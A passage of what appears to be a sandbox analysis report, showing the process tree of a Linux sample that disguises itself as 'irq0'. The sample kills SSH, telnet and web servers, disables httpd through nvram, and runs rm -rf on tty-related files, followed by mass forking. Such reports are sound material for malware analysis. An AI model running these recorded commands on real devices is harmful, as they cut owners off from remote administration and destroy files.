            • systemctl (PID: 6953, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 6965, Parent: 5615)
            • systemctl (PID: 6965, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 7000, Parent: 5615)
            • systemctl (PID: 7000, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 7018, Parent: 5615)
            • systemctl (PID: 7018, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 7050, Parent: 5615)
            • systemctl (PID: 7050, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 5615, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop httpd.service
        • irq0 New Fork (PID: 5616, Parent: 5526)
        • sh (PID: 5616, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5639, Parent: 5616)
          • killall (PID: 5639, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 mini_httpd
        • irq0 New Fork (PID: 5641, Parent: 5526)
        • sh (PID: 5641, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5682, Parent: 5641)
          • killall (PID: 5682, Parent: 5641, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 minihttpd
        • irq0 New Fork (PID: 5686, Parent: 5526)
        • sh (PID: 5686, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 5712, Parent: 5686)
            • sh New Fork (PID: 5716, Parent: 5712)
            • cat (PID: 5716, Parent: 5712, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/thttpd.pid
        • irq0 New Fork (PID: 5717, Parent: 5526)
        • sh (PID: 5717, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
        • irq0 New Fork (PID: 5741, Parent: 5526)
        • sh (PID: 5741, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "nvram set http_enable=0 > /dev/null 2>&1"
        • irq0 New Fork (PID: 5751, Parent: 5526)
        • sh (PID: 5751, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 httpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5776, Parent: 5751)
          • killall (PID: 5776, Parent: 5751, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 httpd
        • irq0 New Fork (PID: 5780, Parent: 5526)
        • sh (PID: 5780, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service telnetd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 5798, Parent: 5780)
          • service (PID: 5798, Parent: 3310, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service telnetd stop
            • service New Fork (PID: 5802, Parent: 5798)
            • basename (PID: 5802, Parent: 5798, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5812, Parent: 5798)
            • basename (PID: 5812, Parent: 5798, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5881, Parent: 5798)
            • systemctl (PID: 5881, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 6016, Parent: 5798)
              • service New Fork (PID: 6018, Parent: 6016)
              • systemctl (PID: 6018, Parent: 6016, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 6019, Parent: 6016)
              • sed (PID: 6019, Parent: 6016, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 6172, Parent: 5798)
            • systemctl (PID: 6172, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 6324, Parent: 5798)
            • systemctl (PID: 6324, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 6382, Parent: 5798)
            • systemctl (PID: 6382, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 6423, Parent: 5798)
            • systemctl (PID: 6423, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 6489, Parent: 5798)
            • systemctl (PID: 6489, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 6550, Parent: 5798)
            • systemctl (PID: 6550, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 6606, Parent: 5798)
            • systemctl (PID: 6606, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 6647, Parent: 5798)
            • systemctl (PID: 6647, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 6674, Parent: 5798)
            • systemctl (PID: 6674, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 6694, Parent: 5798)
            • systemctl (PID: 6694, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 6727, Parent: 5798)
            • systemctl (PID: 6727, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 6755, Parent: 5798)
            • systemctl (PID: 6755, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 6782, Parent: 5798)
            • systemctl (PID: 6782, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 6791, Parent: 5798)
            • systemctl (PID: 6791, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 6820, Parent: 5798)
            • systemctl (PID: 6820, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 6849, Parent: 5798)
            • systemctl (PID: 6849, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 6875, Parent: 5798)
            • systemctl (PID: 6875, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 6900, Parent: 5798)
            • systemctl (PID: 6900, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 6935, Parent: 5798)
            • systemctl (PID: 6935, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 6954, Parent: 5798)
            • systemctl (PID: 6954, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 6990, Parent: 5798)
            • systemctl (PID: 6990, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 7017, Parent: 5798)
            • systemctl (PID: 7017, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 7044, Parent: 5798)
            • systemctl (PID: 7044, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 7071, Parent: 5798)
            • systemctl (PID: 7071, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 5798, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop telnetd.service
        • irq0 New Fork (PID: 5800, Parent: 5526)
        • sh (PID: 5800, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service sshd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 5810, Parent: 5800)
          • service (PID: 5810, Parent: 5800, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service sshd stop
            • service New Fork (PID: 5820, Parent: 5810)
            • basename (PID: 5820, Parent: 5810, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5870, Parent: 5810)
            • basename (PID: 5870, Parent: 5810, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5920, Parent: 5810)
            • systemctl (PID: 5920, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 6017, Parent: 5810)
              • service New Fork (PID: 6020, Parent: 6017)
              • systemctl (PID: 6020, Parent: 6017, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 6021, Parent: 6017)
              • sed (PID: 6021, Parent: 6017, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 6322, Parent: 5810)
            • systemctl (PID: 6322, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 6383, Parent: 5810)
            • systemctl (PID: 6383, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 6424, Parent: 5810)
            • systemctl (PID: 6424, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 6484, Parent: 5810)
            • systemctl (PID: 6484, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 6548, Parent: 5810)
            • systemctl (PID: 6548, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 6603, Parent: 5810)
            • systemctl (PID: 6603, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 6650, Parent: 5810)
            • systemctl (PID: 6650, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 6676, Parent: 5810)
            • systemctl (PID: 6676, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 6715, Parent: 5810)
            • systemctl (PID: 6715, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 6738, Parent: 5810)
            • systemctl (PID: 6738, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 6765, Parent: 5810)
            • systemctl (PID: 6765, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 6784, Parent: 5810)
            • systemctl (PID: 6784, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 6819, Parent: 5810)
            • systemctl (PID: 6819, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 6846, Parent: 5810)
            • systemctl (PID: 6846, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 6874, Parent: 5810)
            • systemctl (PID: 6874, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 6901, Parent: 5810)
            • systemctl (PID: 6901, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 6937, Parent: 5810)
            • systemctl (PID: 6937, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 6955, Parent: 5810)
            • systemctl (PID: 6955, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 6989, Parent: 5810)
            • systemctl (PID: 6989, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 7016, Parent: 5810)
            • systemctl (PID: 7016, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 7043, Parent: 5810)
            • systemctl (PID: 7043, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 7070, Parent: 5810)
            • systemctl (PID: 7070, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 7082, Parent: 5810)
            • systemctl (PID: 7082, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 7153, Parent: 5810)
            • systemctl (PID: 7153, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 5810, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop sshd.service
        • irq0 New Fork (PID: 5814, Parent: 5526)
        • sh (PID: 5814, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 telnetd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5872, Parent: 5814)
          • killall (PID: 5872, Parent: 5814, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd
        • irq0 New Fork (PID: 5880, Parent: 5526)
        • sh (PID: 5880, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5923, Parent: 5880)
          • killall (PID: 5923, Parent: 5880, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 utelnetd
        • irq0 New Fork (PID: 5927, Parent: 5526)
        • sh (PID: 5927, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 dropbear > /dev/null 2>&1 &"
          • sh New Fork (PID: 5966, Parent: 5927)
          • killall (PID: 5966, Parent: 5927, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 dropbear
        • irq0 New Fork (PID: 5968, Parent: 5526)
        • sh (PID: 5968, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 sshd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5985, Parent: 5968)
          • killall (PID: 5985, Parent: 5968, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 sshd
        • irq0 New Fork (PID: 5987, Parent: 5526)
        • sh (PID: 5987, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5991, Parent: 5987)
          • killall (PID: 5991, Parent: 5987, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 lighttpd
        • irq0 New Fork (PID: 8441, Parent: 5526)
          • irq0 New Fork (PID: 8443, Parent: 8441)
          • sh (PID: 8443, Parent: 8441, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear ; rm -rf /var/run/tt* /tmp/tt* )>/dev/null 2>&1 & "
            • sh New Fork (PID: 8445, Parent: 8443)
              • sh New Fork (PID: 8446, Parent: 8445)
              • cat (PID: 8446, Parent: 8445, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/dropbear.pid
              • sh New Fork (PID: 8447, Parent: 8445)
              • cat (PID: 8447, Parent: 8445, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/sshd.pid
              • sh New Fork (PID: 8472, Parent: 8445)
              • killall (PID: 8472, Parent: 8445, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear
            • rm (PID: 8445, Parent: 3310, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/tt* /tmp/tt*
        • irq0 New Fork (PID: 8489, Parent: 5526)
          • irq0 New Fork (PID: 8491, Parent: 8489)
          • irq0 New Fork (PID: 8492, Parent: 8489)
          • irq0 New Fork (PID: 8493, Parent: 8489)
          • irq0 New Fork (PID: 8494, Parent: 8489)
          • irq0 New Fork (PID: 8495, Parent: 8489)
          • irq0 New Fork (PID: 8496, Parent: 8489)
          • irq0 New Fork (PID: 8503, Parent: 8489)
          • irq0 New Fork (PID: 8505, Parent: 8489)
          • irq0 New Fork (PID: 8506, Parent: 8489)
          • irq0 New Fork (PID: 8509, Parent: 8489)
          • irq0 New Fork (PID: 8511, Parent: 8489)
          • irq0 New Fork (PID: 8512, Parent: 8489)
          • irq0 New Fork (PID: 8513, Parent: 8489)
          • irq0 New Fork (PID: 8518, Parent: 8489)
          • irq0 New Fork (PID: 8519, Parent: 8489)
          • irq0 New Fork (PID: 8522, Parent: 8489)
          • irq0 New Fork (PID: 8524, Parent: 8489)
          • irq0 New Fork (PID: 8526, Parent: 8489)
          • irq0 New Fork (PID: 8529, Parent: 8489)
          • irq0 New Fork (PID: 8530, Parent: 8489)
          • irq0 New Fork (PID: 8532, Parent: 8489)
          • irq0 New Fork (PID: 8535, Parent: 8489)
          • irq0 New Fork (PID: 8537, Parent: 8489)
          • irq0 New Fork (PID: 8539, Parent: 8489)
          • irq0 New Fork (PID: 8540, Parent: 8489)
          • irq0 New Fork (PID: 8543, Parent: 8489)
          • irq0 New Fork (PID: 8544, Parent: 8489)
          • irq0 New Fork (PID: 8547, Parent: 8489)
          • irq0 New Fork (PID: 8548, Parent: 8489)
          • irq0 New Fork (PID: 8561, Parent: 8489)
          • irq0 New Fork (PID: 8562, Parent: 8489)
          • irq0 New Fork (PID: 8563, Parent: 8489)
          • irq0 New Fork (PID: 8577, Parent: 8489)
          • irq0 New Fork (PID: 8578, Parent: 8489)
          • irq0 New Fork (PID: 8590, Parent: 8489)
          • irq0 New Fork (PID: 8591, Parent: 8489)
          • irq0 New Fork (PID: 8592, Parent: 8489)
          • irq0 New Fork (PID: 8596, Parent: 8489)
          • irq0 New Fork (PID: 8597, Parent: 8489)
          • irq0 New Fork (PID: 8600, Parent: 8489)
          • irq0 New Fork (PID: 8601, Parent: 8489)
          • irq0 New Fork (PID: 8604, Parent: 8489)
          • irq0 New Fork (PID: 8605, Parent: 8489)
          • irq0 New Fork (PID: 8606, Parent: 8489)
          • irq0 New Fork (PID: 8610, Parent: 8489)
          • irq0 New Fork (PID: 8612, Parent: 8489)
          • irq0 New Fork (PID: 8613, Parent: 8489)
          • irq0 New Fork (PID: 8614, Parent: 8489)
          • irq0 New Fork (PID: 8618, Parent: 8489)
          • irq0 New Fork (PID: 8620, Parent: 8489)
          • irq0 New Fork (PID: 8621, Parent: 8489)
          • irq0 New Fork (PID: 8624, Parent: 8489)
          • irq0 New Fork (PID: 8625, Parent: 8489)
          • irq0 New Fork (PID: 8628, Parent: 8489)
          • irq0 New Fork (PID: 8629, Parent: 8489)
          • irq0 New Fork (PID: 8632, Parent: 8489)
          • irq0 New Fork (PID: 8633, Parent: 8489)
          • irq0 New Fork (PID: 8636, Parent: 8489)
          • irq0 New Fork (PID: 8637, Parent: 8489)
          • irq0 New Fork (PID: 8640, Parent: 8489)
          • irq0 New Fork (PID: 8642, Parent: 8489)
          • irq0 New Fork (PID: 8643, Parent: 8489)
          • irq0 New Fork (PID: 8644, Parent: 8489)
          • irq0 New Fork (PID: 8648, Parent: 8489)
          • irq0 New Fork (PID: 8649, Parent: 8489)
          • irq0 New Fork (PID: 8652, Parent: 8489)
          • irq0 New Fork (PID: 8654, Parent: 8489)
          • irq0 New Fork (PID: 8655, Parent: 8489)
          • irq0 New Fork (PID: 8658, Parent: 8489)
          • irq0 New Fork (PID: 8660, Parent: 8489)
          • irq0 New Fork (PID: 8663, Parent: 8489)
          • irq0 New Fork (PID: 8664, Parent: 8489)
          • irq0 New Fork (PID: 8667, Parent: 8489)
          • irq0 New Fork (PID: 8668, Parent: 8489)
          • irq0 New Fork (PID: 8671, Parent: 8489)
          • irq0 New Fork (PID: 8672, Parent: 8489)
          • irq0 New Fork (PID: 8675, Parent: 8489)
          • irq0 New Fork (PID: 8676, Parent: 8489)
          • irq0 New Fork (PID: 8679, Parent: 8489)
          • irq0 New Fork (PID: 8681, Parent: 8489)
          • irq0 New Fork (PID: 8682, Parent: 8489)
          • irq0 New Fork (PID: 8685, Parent: 8489)
          • irq0 New Fork (PID: 8686, Parent: 8489)
          • irq0 New Fork (PID: 8689, Parent: 8489)
          • irq0 New Fork (PID: 8690, Parent: 8489)
          • irq0 New Fork (PID: 8693, Parent: 8489)
          • irq0 New Fork (PID: 8694, Parent: 8489)
          • irq0 New Fork (PID: 8697, Parent: 8489)
          • irq0 New Fork (PID: 8698, Parent: 8489)
          • irq0 New Fork (PID: 8699, Parent: 8489)
          • irq0 New Fork (PID: 8703, Parent: 8489)
          • irq0 New Fork (PID: 8705, Parent: 8489)
          • irq0 New Fork (PID: 8706, Parent: 8489)
          • irq0 New Fork (PID: 8709, Parent: 8489)
          • irq0 New Fork (PID: 8710, Parent: 8489)
          • irq0 New Fork (PID: 8712, Parent: 8489)
          • irq0 New Fork (PID: 8713, Parent: 8489)
          • irq0 New Fork (PID: 8714, Parent: 8489)
          • irq0 New Fork (PID: 8720, Parent: 8489)
          • irq0 New Fork (PID: 8721, Parent: 8489)
          • irq0 New Fork (PID: 8724, Parent: 8489)
          • irq0 New Fork (PID: 8725, Parent: 8489)
          • irq0 New Fork (PID: 8728, Parent: 8489)
          • irq0 New Fork (PID: 8729, Parent: 8489)
          • irq0 New Fork (PID: 8730, Parent: 8489)
          • irq0 New Fork (PID: 8734, Parent: 8489)
          • irq0 New Fork (PID: 8735, Parent: 8489)
          • irq0 New Fork (PID: 8736, Parent: 8489)
          • irq0 New Fork (PID: 8740, Parent: 8489)
          • irq0 New Fork (PID: 8741, Parent: 8489)
          • irq0 New Fork (PID: 8744, Parent: 8489)
          • irq0 New Fork (PID: 8745, Parent: 8489)
          • irq0 New Fork (PID: 8746, Parent: 8489)
          • irq0 New Fork (PID: 8751, Parent: 8489)
          • irq0 New Fork (PID: 8752, Parent: 8489)
          • irq0 New Fork (PID: 8755, Parent: 8489)
          • irq0 New Fork (PID: 8756, Parent: 8489)
          • irq0 New Fork (PID: 8759, Parent: 8489)
          • irq0 New Fork (PID: 8760, Parent: 8489)
          • irq0 New Fork (PID: 8763, Parent: 8489)
          • irq0 New Fork (PID: 8764, Parent: 8489)
          • irq0 New Fork (PID: 8767, Parent: 8489)
          • irq0 New Fork (PID: 8768, Parent: 8489)
          • irq0 New Fork (PID: 8771, Parent: 8489)
          • irq0 New Fork (PID: 8773, Parent: 8489)
          • irq0 New Fork (PID: 8775, Parent: 8489)
          • irq0 New Fork (PID: 8776, Parent: 8489)
          • irq0 New Fork (PID: 8779, Parent: 8489)
          • irq0 New Fork (PID: 8780, Parent: 8489)
          • irq0 New Fork (PID: 8783, Parent: 8489)
          • irq0 New Fork (PID: 8785, Parent: 8489)
          • irq0 New Fork (PID: 8786, Parent: 8489)
          • irq0 New Fork (PID: 8789, Parent: 8489)
          • irq0 New Fork (PID: 8790, Parent: 8489)
          • irq0 New Fork (PID: 8793, Parent: 8489)
          • irq0 New Fork (PID: 8795, Parent: 8489)
          • irq0 New Fork (PID: 8796, Parent: 8489)
          • irq0 New Fork (PID: 8799, Parent: 8489)
          • irq0 New Fork (PID: 8801, Parent: 8489)
          • irq0 New Fork (PID: 8802, Parent: 8489)
          • irq0 New Fork (PID: 8805, Parent: 8489)
          • irq0 New Fork (PID: 8806, Parent: 8489)
          • irq0 New Fork (PID: 8807, Parent: 8489)
          • irq0 New Fork (PID: 8811, Parent: 8489)
          • irq0 New Fork (PID: 8814, Parent: 8489)
          • irq0 New Fork (PID: 8816, Parent: 8489)
          • irq0 New Fork (PID: 8817, Parent: 8489)
          • irq0 New Fork (PID: 8819, Parent: 8489)
          • irq0 New Fork (PID: 8822, Parent: 8489)
          • irq0 New Fork (PID: 8824, Parent: 8489)
          • irq0 New Fork (PID: 8825, Parent: 8489)
          • irq0 New Fork (PID: 8828, Parent: 8489)
          • irq0 New Fork (PID: 8829, Parent: 8489)
          • irq0 New Fork (PID: 8832, Parent: 8489)
          • irq0 New Fork (PID: 8833, Parent: 8489)
          • irq0 New Fork (PID: 8834, Parent: 8489)
          • irq0 New Fork (PID: 8838, Parent: 8489)
          • irq0 New Fork (PID: 8839, Parent: 8489)
          • irq0 New Fork (PID: 8843, Parent: 8489)
          • irq0 New Fork (PID: 8844, Parent: 8489)
          • irq0 New Fork (PID: 8847, Parent: 8489)
          • irq0 New Fork (PID: 8848, Parent: 8489)
          • irq0 New Fork (PID: 8849, Parent: 8489)
          • irq0 New Fork (PID: 8850, Parent: 8489)
          • irq0 New Fork (PID: 8856, Parent: 8489)
          • irq0 New Fork (PID: 8857, Parent: 8489)
          • irq0 New Fork (PID: 8860, Parent: 8489)
          • irq0 New Fork (PID: 8861, Parent: 8489)
          • irq0 New Fork (PID: 8864, Parent: 8489)
          • irq0 New Fork (PID: 8865, Parent: 8489)
          • irq0 New Fork (PID: 8866, Parent: 8489)
          • irq0 New Fork (PID: 8870, Parent: 8489)
          • irq0 New Fork (PID: 8871, Parent: 8489)
          • irq0 New Fork (PID: 8874, Parent: 8489)
          • irq0 New Fork (PID: 8877, Parent: 8489)
          • irq0 New Fork (PID: 8878, Parent: 8489)
          • irq0 New Fork (PID: 8881, Parent: 8489)
          • irq0 New Fork (PID: 8882, Parent: 8489)
          • irq0 New Fork (PID: 8885, Parent: 8489)
          • irq0 New Fork (PID: 8886, Parent: 8489)
          • irq0 New Fork (PID: 8887, Parent: 8489)
          • irq0 New Fork (PID: 8891, Parent: 8489)
          • irq0 New Fork (PID: 8892, Parent: 8489)
          • irq0 New Fork (PID: 8895, Parent: 8489)
          • irq0 New Fork (PID: 8896, Parent: 8489)
          • irq0 New Fork (PID: 8899, Parent: 8489)
          • irq0 New Fork (PID: 8900, Parent: 8489)
          • irq0 New Fork (PID: 8903, Parent: 8489)
          • irq0 New Fork (PID: 8905, Parent: 8489)
          • irq0 New Fork (PID: 8906, Parent: 8489)
          • irq0 New Fork (PID: 8909, Parent: 8489)
          • irq0 New Fork (PID: 8911, Parent: 8489)
          • irq0 New Fork (PID: 8913, Parent: 8489)
          • irq0 New Fork (PID: 8915, Parent: 8489)
          • irq0 New Fork (PID: 8916, Parent: 8489)
          • irq0 New Fork (PID: 8919, Parent: 8489)
          • irq0 New Fork (PID: 8921, Parent: 8489)
          • irq0 New Fork (PID: 8922, Parent: 8489)
          • irq0 New Fork (PID: 8925, Parent: 8489)
          • irq0 New Fork (PID: 8926, Parent: 8489)
          • irq0 New Fork (PID: 8929, Parent: 8489)
          • irq0 New Fork (PID: 8930, Parent: 8489)
          • irq0 New Fork (PID: 8933, Parent: 8489)
          • irq0 New Fork (PID: 8936, Parent: 8489)
          • irq0 New Fork (PID: 8937, Parent: 8489)
          • irq0 New Fork (PID: 8957, Parent: 8489)
          • irq0 New Fork (PID: 8958, Parent: 8489)
          • irq0 New Fork (PID: 8959, Parent: 8489)
          • irq0 New Fork (PID: 8972, Parent: 8489)
          • irq0 New Fork (PID: 8973, Parent: 8489)
